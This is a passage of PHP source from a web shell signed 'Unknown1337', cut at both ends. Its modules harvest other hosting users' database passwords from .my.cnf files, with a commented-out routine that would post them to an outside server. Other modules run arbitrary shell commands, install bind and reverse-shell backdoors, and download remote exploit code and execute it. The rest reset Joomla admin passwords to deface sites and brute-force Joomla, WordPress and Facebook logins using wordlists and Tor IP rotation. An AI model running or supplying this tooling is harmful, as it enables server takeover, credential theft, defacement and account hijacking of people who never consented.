$ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } echo '<br><br><style> textarea { resize:none; color:black; background-color:#ffffff; font-size:8pt; color:black; border:1px solid white ; border-left: 4px solid white ; } input { color: black; border:1px dotted white; } </style>'; echo '<center>'; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo "<table align=center><tr><th valign=top class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>"; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>"; $dc++; $success3="http://".$domain."|".$owner['name']."|".$password."\n"; //Fungsi log dinonaktifkan oleh Unknown1337 /* $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php"); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3)); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); $buffer = curl_exec($ch); */ } } } echo '</table>'; $total = $dc; echo '</center>'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt'); $p=file_get_contents(''.$path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>"; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '</table>'; $total = $dc; echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />'; echo '</center>'; } }else{ echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>"; } } elseif($_GET['do'] == 'bypassserver') { ?> <form action="?dir=<?php echo $pwd; ?>&do=bypassserver" method="post"> <center/><br/><b><font color=white>-=[ Command Bypass Exploit By Unknown1337 ]=-</font></b><br> <?php print_r(' <pre> <form method="POST" action=""> <b><font color=white><b><font color="white">Command </font></font></b><input name="baba" type="text" class="inputz" size="34"> <input type="submit" class="inputzbut" value="Go"> </form> <form method="POST" action=""><strong><b><font color="white">Menu Bypass</font></strong><select name="liz0" size="1" class="inputz"> <option value="cat /etc/passwd">/etc/passwd</option> <option value="netstat -an | grep -i listen">netstat</option> <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option> <option value="cat /etc/syslog.conf">/etc/syslog.conf</option> <option value="cat /etc/hosts">/etc/hosts</option> <option value="cat /etc/named.conf">/etc/named.conf</option> <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option> </select> <input type="submit" class="inputzbut" value="Gö"> </form> </pre> '); ini_restore("safe_mode"); ini_restore("open_basedir"); $liz0=shell_exec($_POST[baba]); $liz0zim=shell_exec($_POST[liz0]); $uid=shell_exec('id'); $server=shell_exec('uname -a'); echo "<pre><h4>"; echo $liz0; echo $liz0zim; echo "</h4></pre>"; "</div>"; ?> <?php } elseif($_GET['do'] == 'bypass-cf'){ echo ' <form method="POST"><br><br> <center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass CloudFlare By Unknown1337 ]=--+ </font></b></p> <select class="inputz" name="krz"> <option>ftp</option> <option>direct-conntect</option> <option>webmail</option> <option>cpanel</option> </select> <input class="inputz" type="text" name="target" value="url"> <input class="inputzbut" type="submit" value="Bypass"></center> '; $target = $_POST['target']; # Bypass From FTP if($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>"; } # Bypass From Direct-Connect if($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>"; } # Bypass From Webmail if($_POST['krz'] == "webmail") { $web = gethostbyname("webmail."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>"; } # Bypass From Cpanel if($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='white'>Correct ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>"; } } elseif($_GET['do'] == 'netsploit'){ // bind connect with c if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } // bind connect with perl elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } // back connect with c elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } // back connect with perl elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" action="?dir=<?php echo $pwd; ?>&do=netsploit"> <tr> <td>Port <br><br><br>Pass<br><br><br><br><br></td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"><br><br><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"><br><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><br><input class="inputzbut" type="submit" name="bind" value="Bind" style="width:80px"></td></tr> </form> </table> </td> <td> <table> <form method="post" action="?dir=<?php echo $pwd; ?>&do=netsploit"> <tr><td>IP<br><br><br>Port<br><br><br><br><br></td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"><br><br><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"><br><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><br><input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:80px"></td></tr> </form> </table> </td> <td> <table> <form method="post" action="?dir=<?php echo $pwd; ?>&do=netsploit"> <tr><td>url<br><br><br>cmd<br><br><br><br><br></td><td><input class="inputz" type="text" name="wurl" style="width:180px;" value="www.some-code/exploits.c"><br><br><input class="inputz" type="text" name="wcmd" style="width:180px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"><br><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select><br><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:80px;"></td></tr> </form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif($_GET['do'] == 'jodexer'){ ?> <form action="?dir=<?php echo $pwd; ?>&do=jodexer" method="post"> <?php function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } if ($_POST['form_action']) { $text=file_get_contents($_POST['file']); $username=entre2v2($text,"public $user = '","';"); $password=entre2v2($text,"public $password = ', '","';"); $dbname=entre2v2($text,"public $db = ', '","';"); $dbprefix=entre2v2($text,"public $dbprefix = '","';"); $site_url=($_POST['site_url']); $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>"; $co=randomt(); /* echo($username); echo("<br>"); echo($password); echo("<br>"); echo($dbname); echo("<br>"); echo($dbprefix); echo("<br>"); */ $co=randomt(); if ($_POST['form_action']) { $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>"; $link=mysql_connect("dzoed.druknet.bt",$username,$password) ; mysql_select_db($dbname,$link) ; $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); echo("<br>[+] Changing admin password to 123456789"); $req =mysql_query("SELECT * from `".$dbprefix."extensions` "); if ( $req ) { ################################################################# ###################### V1.6 ###################### ################################################################# $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); $data = mysql_fetch_array($req); $template_id=$data["extension_id"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"'); $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4); /////////////////////////// $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,"com_config"); if($pos === false) { echo("<br>[-] Login Error"); exit; } else { echo("<br>[~] Login Successful"); } /////////////////////////// $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2); if($hidden2) { echo("<br>[+] index.php file founded in Theme Editor"); } else { echo("<br>[-] index.php Not found in Theme Editor"); exit; } echo("<br>[*] Updating Index.php ....."); $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'<dd class="message message">'); if($pos === false) { echo("<br>[-] Updating Index.php Error"); exit; } else { echo("<br>[~] index.php successfully saved"); } ################################################################# ###################### V1.6 END ###################### ################################################################# } else { ################################################################# ###################### V1.5 ###################### ################################################################# $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3); $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,"com_config"); if($pos === false) { echo("<br>[-] Login Error"); exit; } else { echo("<br>[+] Login Successful"); } /////////////////////////// $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6); if($hidden2) { echo("<br>[~] index.php file founded in Theme Editor"); } else { echo("<br>[-] index.php Not found in Theme Editor"); } echo("<br>[*] Updating Index.php ....."); $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'<dd class="message message fade">'); if($pos === false) { echo("<br>[-] Updating Index.php Error"); exit; } else { echo("<br>[~] index.php successfully saved"); } ################################################################# ###################### V1.5 END ###################### ################################################################# } } function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } }?> <center><br><br> <font color="white" size='+3'><b>+--=[ Automatic Joomla Index Changer By Unknown1337 ]=--+</b></font><br><br> </center> <center><b> Link of symlink configuration.php of Joomla<br></b> <FORM action="" method="post"> <input type="hidden" name="form_action" value="1"> <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php"> <br> <br><b> Admin Control panel url</b><br> <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br> <br><b> Your Index Code</b> <br> <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code </TEXTAREA> <br> <INPUT class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit"> </FORM> </center> <script language=JavaScript>m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script> <?php } elseif($_GET['do'] == 'jbrute'){ ?> <form action="?dir=<?php echo $pwd; ?>&do=jbrute" method="post"> <meta name="author" content="Unknown1337" /> <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" /> <meta name="description" content="Unknown1337" /> <center> </br></br> <center><b><font color="lime">+--=[ Joomla Brute Force By Unknown1337 ]=--+</font></b><br /><br /> <form method="post" action="" enctype="multipart/form-data"> <table class="tabnet" width="38%" border="0"><center> <th colspan="2">Joomla Brute Force</th> <tr><td><p ><font class="d1">User :</font></th> <input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p> </td></tr> <tr><td><font class="">Sites list :</font> </td><td><font class="" >Pass list :</font></td></tr> <tr> <td> <textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea> </td><td> <textarea name="w0rds" style="background:black;" cols="40" rows="13" > admin 123456 password 102030 123123 12345 123456789 pass test admin123 demo !@#$%^ </textarea> </td></tr><center><tr><td> <font > <input class="inputzbut" type="submit" name="x" value="start" id="d4"> </font></td></tr><br> Greetz : All Indonesian Hackers <br></center></table> </form></center> <?php @set_time_limit(0); if($_POST['x']){ echo "<hr>"; $sites = explode("\n",$_POST["sites"]); // Get Sites $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt $Attack = new Joomla_brute_Force(); // Active Class foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D flush();flush(); } } } # Class & Function'z function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); } class Joomla_brute_Force{ public function check_it($site,$user,$pass){ // print result if(eregi('com_config',$this->post($site,$user,$pass))){ echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>"; $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f); flush(); }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} } public function post($site,$user,$pass){ // Post -> user & pass $token = $this->extract_token($site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1'); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function extract_token($site){ // get token from source for -> function post $source = $this->get_source($site); preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); return $token[1][0]; } public function get_source($site){ // get source for -> function extract_token $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } } } elseif($_GET['do'] == 'wpbrute'){ ?> <form action="?dir=<?php echo $pwd; ?>&do=wpbrute" method="post"> <center> <br><Br><b><font size='2' >+--=[ Wordpress Brute Force By Unknown1337 ]=--+</font><br> <form enctype="multipart/form-data" method="POST"> <table width='624' border='0' class='tabnet' id='Box'> <tr><th colspan="5">Wordpress Brute Force</th></tr> <tr> <td > </td> <td ><p>Hosts:</p></td> <td ><p> Users:</p></td> <td ><p>Passwords:</p></td> </tr> <tr> <td> </td> <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td> <td ><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td> <td ><textarea style="background:black;" name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td> </tr> <tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" /> <?php if($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if($passwords && $usernames && $hosts) { $hosts_explode = explode("\n", $hosts); $usernames_explode = explode("\n", $usernames); $passwords_explode = explode("\n", $passwords); foreach($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("http://","https://","www."),"",trim($host)); $host = "http://".$host; $wpAdmin = $host.'/wp-admin/'; if(!url_exists($host."/wp-login.php")) {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;} foreach($usernames_explode as $username) { foreach($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php'); curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt"); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_POST,TRUE); curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1"); $login = curl_exec($ch); if(eregi ("profile.php",$login) ) { $hacked = 1; echo "<p>".$host." => UserName : [<font color='white'>".$username."</font>] : Password : [<font color='white'>".$password."</font>]</p>"; ob_flush();flush();break; } } if($hacked == 1){break;} } if($hacked == 0) {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();} } } else {echo "<p><font color='red'>All fields are Required ! </font></p>";} } ?> </td></tr> </table></form></center> <?php function url_exists($strURL) { $resURL = curl_init(); curl_setopt($resURL, CURLOPT_URL, $strURL); curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1); curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback'); curl_setopt($resURL, CURLOPT_FAILONERROR, 1); curl_exec ($resURL); $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE); curl_close ($resURL); if ($intReturnCode != 200){return false;} else{return true ;} } function filter($string) { if(get_magic_quotes_gpc() != 0){return stripslashes($string); } else{return $string; } } function RemoveLastSlash($host) { if(strrpos($host, '/', -1) == strlen($host)-1) {return substr($host,0,strrpos($host, '/', -1));} else{return $host;} } echo "</p>"; } elseif($_GET['do'] == 'fb'){ @ini_set('output_buffering',0); ?> <form action="?dir=<?php echo $pwd; ?>dox=fb" method="post"> <br><br><center><b><font size=4>+--=[ Facebook BruteForce by Unknown1337 ]=--+</font></b></center><br><br> <?php ob_start(); @set_time_limit(0); ################################################# #---------------------------------------------- # # Facebook Brute Force 2018 # # Coded by : Unknown1337 # # Greetz : All LulzGhost Members # # WWW.lulzghost-team.site # # --------------------------------------------- # ################################################# echo " <head> <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/> <form method='POST'> <title>Facebook Brute Force 2018</title> </head> <style> textarea { resize:none; color: #1975FF ; border:1px solid #1975FF ; border-left: 4px solid #1975FF ; } input { color: #1975FF; border:1px dotted white; } </style>"; echo " <body text='red'> <center><img src='http://i.imgur.com/MiRrYCo.gif'></center> <center>Gunakan ini dengan TOR BROWSER + TOR SWITCHER (ganti IP setiap 2 Menit Supaya Gak DIblok FB cok :v)</center> <p dir='ltr' align='center'> <textarea name='username' cols='42' rows='14'>Username Target Lu Cok</textarea> <textarea name='password' cols='42' rows='14'>Wordlist Password Target Lu Cok</textarea><br> <br> <input type='submit' name='scan' value='Start BruteForce'><br></p>"; if(isset($_POST['scan'])){ #To Put Proxy SOCKS V5 //curl_setopt($ch, CURLOPT_PROXY, "proxy:port"); //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); function brute($user,$pass){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, 